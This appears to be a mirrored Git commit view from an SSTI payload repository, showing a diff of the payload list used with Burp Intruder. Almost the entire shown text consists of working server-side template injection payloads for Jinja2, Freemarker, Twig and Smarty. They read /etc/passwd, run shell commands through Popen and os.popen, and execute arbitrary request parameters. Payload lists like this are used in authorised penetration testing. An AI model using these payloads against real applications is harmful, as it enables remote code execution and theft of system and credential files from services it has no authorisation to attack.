External/ssti-payloads
1
0
Fork 0
mirror of https://github.com/payloadbox/ssti-payloads.git synced 2025-12-29 16:15:07 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3 from zAbuQasem/patch-1

Browse Source 
Changed the shell command in payload #27
This commit is contained in:
İsmail Taşdelen
2021-09-04 07:31:38 +03:00
committed by GitHub
parent 4f8c6378bc 365a746711
commit d7a9127d2c
1 changed files with 2 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Intruder/ssti-payloads.txt
View File

@@ -24,7 +24,7 @@ ${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}